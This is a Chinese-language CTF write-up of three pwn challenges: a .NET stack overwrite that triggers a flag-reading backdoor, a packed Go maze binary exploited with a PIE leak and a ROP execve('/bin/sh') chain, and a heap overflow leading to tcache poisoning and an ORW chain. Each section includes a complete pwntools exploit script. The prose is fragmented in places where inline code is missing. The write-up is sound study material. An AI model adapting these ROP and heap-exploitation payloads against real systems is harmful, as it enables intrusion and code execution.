- 题目给了一个baby_Cat.exe以及一大堆dll,直接IDA分析baby_Cat.exe会发现找不到什么明显的逻辑,但是可以从一些类似字符串信息比如:可以猜测出这个exe实际上是在加载dll,程序主要的逻辑就在加载的dll中执行。
- 查看题目给的一堆dll中,会发现exe同名的baby_Cat.dll,用dnSpy x86反编译,成功定位到关键函数:
private unsafe static void Main(string[] args) { char* ptr = stackalloc char[(UIntPtr)100]; int num = 1; int* ptr2 = (int*)(ptr + 50); Program @object = new Program(); Program.MsgHandler msgHandler = new Program.MsgHandler(@object.Right); Program.MsgHandler msgHandler2 = new Program.MsgHandler(@object.Backdoor); Console.WriteLine("This is a gift for you : {0:x4}", &num); Console.WriteLine("What do you want me to repeat?"); ptr2[1] = 0; ptr2[2] = ptr; *ptr2 = 0; while (ptr2[1] < 53) { char c = (char)Console.Read(); bool flag = c == '\n'; if (flag) { break; } bool flag2 = c == '\r'; if (!flag2) { ptr[*ptr2] = c; ptr2[1]++; } (*ptr2)++; } Console.WriteLine("Do you want to change your input?"); char c2 = (char)Console.Read(); bool flag3 = c2 == 'N' || c2 == 'n'; if (flag3) { msgHandler(ptr); } else { Console.WriteLine("Please tell me a offset!"); char* ptr3 = ptr2[2]; Console.ReadLine(); int num2 = Console.Read(); for (int i = 0; i < num2; i++) { char* ptr4 = ptr3 + i; *ptr4 -= '\u0001'; } bool flag4 = num == 1; if (flag4) { msgHandler(ptr); } else { msgHandler2(ptr); } } }
- 可以看到逻辑很简单,申请了一个大小为100的字符串数组
储存的是接受的字符个数。 - 而至于这个
,他们分别是:Program.MsgHandler msgHandler = new Program.MsgHandler(@object.Right); Program.MsgHandler msgHandler2 = new Program.MsgHandler(@object.Backdoor); ... private unsafe void Right(char* args) { for (int i = 0; i < 50; i++) { Console.Write(args[i]); } Console.Write('\n'); } private unsafe void Backdoor(char* args) { Console.WriteLine("I'll give you flag!"); string str = "type C:\\flag.txt"; Process process = new Process(); process.StartInfo.FileName = "cmd.exe"; process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardInput = true; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.RedirectStandardError = true; process.StartInfo.CreateNoWindow = true; process.Start(); process.StandardInput.WriteLine(str + "&exit"); process.StandardInput.AutoFlush = true; string value = process.StandardOutput.ReadToEnd(); process.WaitForExit(); process.Kill(); Console.WriteLine(value); }
,就能拿到flag了。 - 于是只要利用输入覆盖
,使其指向内存中&num - 1
,那么下一次就能覆盖num = 0
。 - 而找到
的偏移,这里需要借助动态调试,利用dnSpy attach到baby_Cat.exe进程,直接查看内存计算偏移:31 00 31 00...
的位置,01 00 00 00
的位置,从而得到偏移为(0x337F1F0 - 0x337F118) / 2 - 1 = 0x6B
。 - 因此只要构造覆盖
,获得flag: - exp
from pwn import * p = remote('', 51000) context.log_level = 'debug' payload = "A" * 50 + chr(0x6b) + '\x00' p.sendline(payload) p.recv() p.sendline('y') p.recv() p.sendline('\x00') p.interactive()
- 首先binary是upx加壳的,直接
upx -d cfgo-checkin
拿到脱壳后的程序拖到IDA分析,发现是个go,尝试用IDAGoHelper恢复符号表,但恢复出来跟没恢复一样;那就直接跑看看: - 100个迷宫,直接写个脚本去解,因为开始做题并没有去逆向binary,而是直接通过收到的字符串判断起点和终点的符号,这里有个坑,就是代表起点和终点的字符是变化的,并不是某个特定的字符,由于是4 bytes编码的字符,其后两位都可能变化。
- 解出100个迷宫之后,可以输入一串字符串:本能地输入很长的字符串之后,程序就crash了,打印出了crash的路径,这里其实也可以看到,之前说的恢复符号表依然是乱七八糟的字符,其实是正确的,从这个crash的函数也可以看出来,从而可以辅助定位关键函数的位置。
- 后面的基本就靠猜了,首先这个crash是由于
的size过大而造成的,可以推断出stack上储存了size的临时变量,那么只要在overflow的时候尽量不破坏其他有效的变量信息,而是直接覆盖return address,就能控制程序流了。 - 后面经过不断地试错尝试,以及根据crash的信息辅助推断,最后确定return address的
offset = 0x110
;以及在offset = 0x70
的位置储存的是一个指针,后续程序复读输入的字符串就是用的这个指针输出;同时size信息储存在offset = 0x78
的位置,只要给一个合理的值即可。 - 至此,还有一个问题就是,程序开了PIE,需要leak PIE,根据前一步说的,控制
offset = 0x70
就可以leak 内存中的数据。于是,根据binary的特性,可以看到stack始终是在0xc000000000
正好储存着binary代码段的地址,因此PIE可以leak了 - leak完PIE之后,显然需要继续执行binary才能达到溢出的目的,所以需要覆盖return address实现二次执行的目的,而因为这个时候并没有leak出PIE地址,所以只能通过partial overwrite的方式覆盖ret address的最后一个bytes。其实这时可以通过查找字符串需要主逻辑的地址,也就是”Leave your name:”,这里有个坑就是IDA直接搜字符串搜不到,可能因为没有解析到,通过二进制搜索可以定位到字符串的地址为`0x11EECE:根据引用找到关键函数
,这里就是输出”Leave your name:”,然后接受输入,最后再复读的逻辑而比较幸运的是:
call nArxBHup
即可,那么这样就能再次利用栈溢出实现后续getshell的rop了 - 因此,总结一下,第一次利用
offset = 0x70
处的指针leak PIE,并且partial write return address返回到nArxBHup
从而提供再次利用栈溢出的机会;第二次直接在return address布置rop getshell: - exp
from pwn import * p = remote('', 62176) # context.log_level = 'debug' context.arch = 'amd64' def convert_to_maze(input): strings = input.split('\n') row = 0 maze = [] for string in strings: i = 0 col = 0 maze_row = [] while i < len(string): if string[i:].startswith('\xf0\x9f\x98')\ or string[i:].startswith('\xf0\x9f\x99')\ or string[i:].startswith('\xf0\x9f\x90')\ or string[i:].startswith('\xf0\x9f\x8D'): start = [row, col] maze_row.append(1) i += 4 elif string[i:].startswith('\xf0\x9f\x9a')\ or string[i:].startswith('\xf0\x9f\x99'): end = [row, col] maze_row.append(1) i += 4 elif string[i:].startswith('\xe2\xac\x9b'): maze_row.append(0) i += 3 elif string[i:].startswith('\xe2\xac\x9c'): maze_row.append(1) i += 3 elif len(string[i:]) < 3: maze_row.append(0) break else: print(string[i:i+4].encode('hex')) print("error input") exit(0) col += 1 maze.append(maze_row) row += 1 return start, maze, end def solve_maze(level): p.recvline() input_maze = "" times = 0 while times <= level + 5: string_get = p.recvline() input_maze += string_get times += 1 # print(input_maze) start, maze, end = convert_to_maze(input_maze) sol = [] if mov(start[0], start[1], maze, end, sol) == False: print("No solution") exit(0) p.sendline(''.join(sol[::-1])) def mov(row, col, maze, end, sol): if row == end[0] and col == end[1]: return True maze[row][col] = 0 row_size = len(maze) col_size = len(maze[row]) if col < col_size and row + 1 < row_size and maze[row + 1][col] == 1: if mov(row + 1, col, maze, end, sol) == True: sol.append('s') return True if col < col_size and row - 1 >= 0 and maze[row - 1][col] == 1: if mov(row - 1, col, maze, end, sol) == True: sol.append('w') return True if col + 1 < col_size and maze[row][col + 1] == 1: if mov(row, col + 1, maze, end, sol) == True: sol.append('d') return True if col - 1 >= 0 and maze[row][col - 1] == 1: if mov(row, col - 1, maze, end, sol) == True: sol.append('a') return True maze[row][col] = 1 return False for i in range(100): solve_maze(i) print("Done " + str(i)) offset = 112 ret_address = 0x158 payload = 'A' * 112 + p64(0xc000000030) + p64(0x40) + 'A' * 0x90 + '\xCE' p.sendline(payload) p.recvuntil('Your name is : ') PIE_base = u64(p.recv(6).ljust(8, "\x00")) - 0x206ac0 pop_rsp = 0x000000000008872e # pop rsp ; ret pop_rdi = 0x0000000000109d3d # pop rdi ; ret pop_rsi = 0x0000000000119c45 # pop rsi ; pop r15 ; ret pop_rax = 0x0000000000074e29 # pop rax ; ret syscall = 0x00000000000743c9 # syscall input_addr = 0x000000c00003edf8 payload = 'A' * 112 + p64(0xc000000030) + p64(0x40) + 'A' * 0x90 payload += flat([PIE_base + pop_rax, 0x3b]) payload += flat([PIE_base + pop_rdi, 0x000000c000044ec8]) payload += flat([PIE_base + pop_rsi, 0, 0]) payload += flat([PIE_base + syscall]) payload += "/bin/sh\x00" p.sendline(payload) success("PIE_base: " + hex(PIE_base)) p.interactive()
- 首先这个看起来挺复杂,其实仔细分析一下,可以理解为一个简单的游戏对战客户端,其中:
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { init_buffer(); hook_exit(); create_file(); open_file(); sandbox(); recv_client(); puts("Welcome to WMCTF!"); puts("Roshambo is a good game!"); puts("Have fun!"); while ( 1 ) client(); }
,经过文件实现进程间的通信:int sub_1E55() { int result; // eax if ( !(unsigned int)check_input() ) { puts("pipe filename is wrong!"); quit(); } strcat(file, "/tmp/"); strcat(file, sha256_auth); strcat(name, file); strcat(name, "_GUEST"); if ( access(file, 0) == -1 ) { file_fifo = mkfifo(file, 0x1FFu); if ( file_fifo ) { fwrite("Could not create fifo!\n", 1uLL, 0x17uLL, stderr); exit(-1); } } if ( access(name, 0) == -1 ) { file_fifo = mkfifo(name, 0x1FFu); if ( file_fifo ) { fwrite("Could not create fifo!\n", 1uLL, 0x17uLL, stderr); exit(-1); } } file_file[0] = open(file, 1); result = open(name, 0); name_file = result; return result; }
而这个函数逻辑只有在Mode C的情况下(程序提供两种模式:C & L)才会调用,也就是说必须有一个C和一个L才能互相通信,而文件名是Mode C下通过对输入的
计算得到的,所以另一个Mode L只要通过在输入room
中看到:void __fastcall __noreturn start_routine(void *a1) { _BOOL4 v1; // eax char s; // [rsp+10h] [rbp-1010h] size_t nbytes; // [rsp+20h] [rbp-1000h] __int64 v4; // [rsp+48h] [rbp-FD8h] unsigned __int64 v5; // [rsp+1018h] [rbp-8h] v5 = __readfsqword(0x28u); memset(&s, 0, 0x1000uLL); while ( !mode_is_L || mode_is_L == 1 ) { read(file_file[mode_is_L == 0], &s, 0x38uLL); read(file_file[mode_is_L == 0], &v4, nbytes); v1 = cmp_with__RPC_(&s); if ( v1 ) play_game((__int64)&s); memset(&s, 0, 0x1000uLL); sleep(1u); } quit(); }
类比成一个最长为0x1000 bytes的数据包,格式如下:
+--------+--------+----------+--------+----------+ | 8 | 8 | 8 | 32 | name_len | +--------+--------+----------+--------+----------+ | status | option | name_len | sha256 | name | +--------+--------+----------+--------+----------+ status: "[RPC]" or "EXIT" option: [1 - 8]
函数中的相应逻辑,重点关注case 8
:void sub_2424() { unsigned int v0; // eax unsigned int v1; // eax unsigned int size; // [rsp+4h] [rbp-Ch] char *size_4; // [rsp+8h] [rbp-8h] size_4 = (char *)malloc(0x1000uLL); memset(size_4, 0, 0x1000uLL); sleep(1u); printf("%s >> ", &name_str[32 * mode_is_L]); read(0, size_4, 0x1000uLL); if ( !strncmp(size_4, "EXIT", 4uLL) ) exit(0); if ( *((_QWORD *)size_4 + 1) != 8LL || game_status != 1 ) { switch ( *((_QWORD *)size_4 + 1) ) { case 1LL: if ( !game_status_remote ) { strcpy(size_4 + 56, (const char *)&name_str[32 * mode_is_L]); *((_QWORD *)size_4 + 2) = strlen((const char *)&name_str[32 * mode_is_L]); sha256((__int64)(size_4 + 24), (__int64)(size_4 + 56), *((_QWORD *)size_4 + 2)); break; } return; case 3LL: print_info((__int64)&name_str[32 * mode_is_L], (__int64)(size_4 + 56)); break; case 4LL: if ( game_status == 1 ) { puts("Game is starting.."); } else { game_status = 1; puts("Game start!"); game_status_remote = 1; } break; case 5LL: if ( game_status_remote != 1 || game_status != 1 ) return; prepared[mode_is_L] = 1; printf(">> You choose %s\n", &aRock[16 * prepared[mode_is_L] - 16]); ++play_times; if ( prepared[mode_is_L == 0] ) play(); else game_status_remote = 2; break; case 6LL: if ( game_status_remote != 1 || game_status != 1 ) return; prepared[mode_is_L] = 2; printf(">> You choose %s\n", &aRock[16 * prepared[mode_is_L] - 16]); ++play_times; if ( prepared[mode_is_L == 0] ) play(); else game_status_remote = 2; break; case 7LL: if ( game_status_remote != 1 || game_status != 1 ) return; prepared[mode_is_L] = 3; printf(">> You choose %s\n", &aRock[16 * prepared[mode_is_L] - 16]); ++play_times; if ( prepared[mode_is_L == 0] ) play(); else game_status_remote = 2; break; default: break; } v1 = get_length((__int64)size_4); write(file_file[mode_is_L], size_4, v1); free(size_4); } else { print_game_result(); v0 = get_length((__int64)size_4); write(file_file[mode_is_L], size_4, v0); free(size_4); printf("size: "); size = read_n(); if ( size > 0x100 ) { puts("Too big!"); exit(-1); } ptr = malloc(size); printf("what do you want to say? "); read(0, ptr, size - 1); printf("leave: %s", ptr); free(ptr); } }
case 8
就是结束游戏,然后留言的功能,进入这个case的前提是游戏已经开始过。 - 同时还要注意的是,存在一个sandbox,禁用了
,那么只能orw了: - 理清逻辑之后,可以开始利用了。关键在于这个
case 8
,接受size的时候,只检查size > 0x100
,而当size = 0
会分配0x20 bytes,而注意到read(0, ptr, size - 1);
,size – 1造成负整数溢出,从而这里存在一个堆溢出。 - 知道这一点之后就很简单了,利用heap overflow伪造unsorted bin,利用unsorted bin来leak libc;再tcache poisoning,分配
为setcontext + 53
的同时,布置好rop即可;最后触发free的时候就读到flag了: - 不过从这个flag来看,最后感觉是不是非预期了啊,确实很多东西都没用到。不过还有一个存在漏洞的点,就是
:void __fastcall sub_15CE(__int64 a1) { unsigned int size; // [rsp+1Ch] [rbp-4h] switch ( *(_QWORD *)(a1 + 8) ) { case 1LL: if ( (unsigned int)check_hash(a1) ) { printf("[Enter Game] Player Name: %s \n\n", a1 + 56); strncpy((char *)&name_str[32 * (mode_is_L == 0)], (const char *)(a1 + 56), 0x20uLL); add_player_info(); } break; case 2LL: if ( (unsigned int)check_hash(a1) ) { printf("[Enter Game] Player Name: %s \n\n", a1 + 56); strncpy((char *)&name_str[32 * (mode_is_L == 0)], (const char *)(a1 + 56), 0x20uLL); } break; case 3LL: if ( *(_QWORD *)(a1 + 16) <= 0x100uLL ) { ptr = malloc(*(_QWORD *)(a1 + 16)); memcpy(ptr, (const void *)(a1 + 56), *(_QWORD *)(a1 + 16)); print_info((__int64)&name_str[32 * (mode_is_L == 0)], (__int64)ptr); sleep(2u); free(ptr); } break; case 4LL: puts("Game start!"); game_status = 1; game_status_remote = 1; break; case 5LL: printf("[%s]: I'm prepared\n", &name_str[32 * (mode_is_L == 0)]); prepared[mode_is_L == 0] = 1; if ( prepared[mode_is_L] ) play(); break; case 6LL: printf("[%s]: I'm prepared\n", &name_str[32 * (mode_is_L == 0)]); prepared[mode_is_L == 0] = 2; if ( prepared[mode_is_L] ) play(); break; case 7LL: printf("[%s]: I'm prepared\n", &name_str[32 * (mode_is_L == 0)]); prepared[mode_is_L == 0] = 3; if ( prepared[mode_is_L] ) play(); break; case 8LL: print_game_result(); printf("size: "); size = read_n(); // integer overflow ============================================= if ( size > 0x100 ) { puts("Too big!"); exit(-1); } ptr = malloc(size); memset(ptr, 0, size); printf("what do you want to say? "); read(0, ptr, size - 1); printf("leave: %s", ptr); free(ptr); break; default: return; } }
case 3
,这与case 8
,那么这里就有一个tcache double free。(这里没有验证过,有兴趣的可以自行尝试) - exp
'''pwn_roshambo_C.py''' from pwn import * p = remote('', 64681) libc = ELF("./libc.so.6") main_arena_offset = 0x3ec0d0 __free_hook_offset = libc.symbols["__free_hook"] setcontext_offset = libc.sym['setcontext'] context.log_level = 'debug' context.arch = 'amd64' def start(auth, name): p.sendlineafter('Your Mode: ', 'C') p.sendlineafter("Authorization: ", auth) p.sendlineafter("Your Name: ", name) def choose(status, case, name_len=0, hash_data="", name="", token=" >> "): payload = status.ljust(8, "\x00") + p64(case) if name_len != 0: payload += p64(name_len) + hash_data + name p.sendlineafter(token, payload) def say(size, content): p.sendlineafter("size: ", str(size)) p.sendlineafter("what do you want to say? ", content) start('123', '123') choose('[RPC]', 8, token="Game start!") say(0x18, 'test') choose('[RPC]', 8, token="Game start!") say(0xF8, 'test') choose('[RPC]', 8, token="Game start!") say(0x28, 'test') choose('[RPC]', 8, token="Game start!") say(0x0, "A" * 0x118 + p64(0x501)) # unsorted bin choose('[RPC]', 8, 0x700, '', (p64(0x21) + p64(0)) * 0x65, token="Game start!") say(0x28, "AAAA") # free unsorted bin choose('[RPC]', 8, token="Game start!") say(0x0, "A" * 0x117 + "libcaddr") # leak p.recvuntil("libcaddr\n") main_arena = u64(p.recv(6).ljust(8, "\x00")) libc_base = main_arena - main_arena_offset __free_hook = libc_base + __free_hook_offset libc_setcontext = libc_base + setcontext_offset # tcahe poisoning choose('[RPC]', 8, token="Game start!") say(0, "A" * 0x18 + p64(0xF1) + p64(__free_hook)) choose('[RPC]', 8, token="Game start!") say(0xF8, "AAAA") # orw pop_rdi = libc_base + 0x000000000002155f # pop rdi ; ret pop_rsi = libc_base + 0x0000000000023e6a # pop rsi ; ret pop_rdx = libc_base + 0x0000000000001b96 # pop rdx ; ret libc_open = libc_base + libc.sym['open'] libc_read = libc_base + libc.sym['read'] libc_write = libc_base + libc.sym['write'] payload = p64(libc_setcontext + 53) payload += flat([__free_hook + 0xB0, pop_rsi, 0, libc_open]) # 0x20 payload += flat([pop_rdi, 5, pop_rsi, __free_hook + 0xC0, pop_rdx, 0x30, libc_read]) # 0x38 payload += flat([pop_rdi, 1, pop_rsi, __free_hook + 0xC0, pop_rdx, 0x30, libc_write]) # 0x38 payload += p64(0) payload += flat([__free_hook + 8, pop_rdi]) payload += 'flag\x00' choose('[RPC]', 8, token="Game start!") say(0xF8, payload) success("libc_base: " + hex(libc_base)) p.interactive() '''pwn_roshambo_L.py''' from pwn import * p = remote('', 64681) context.log_level = 'debug' def start(room, name): p.sendlineafter('Your Mode: ', 'L') p.sendlineafter("Your room: ", room) p.sendlineafter("Your Name: ", name) def choose(status, case, name_len=0, hash_data="", name=""): payload = status.ljust(8, "\x00") + p64(case) if name_len != 0: payload += p64(name_len) + hash_data + name p.sendlineafter(" >> ", payload) def say(size, content): p.sendlineafter("size: ", str(size)) p.sendlineafter("what do you want to say? ", content) start(sys.argv[1], '123') for i in range(10): choose('[RPC]', 4) say(0x18, 'test') p.interactive()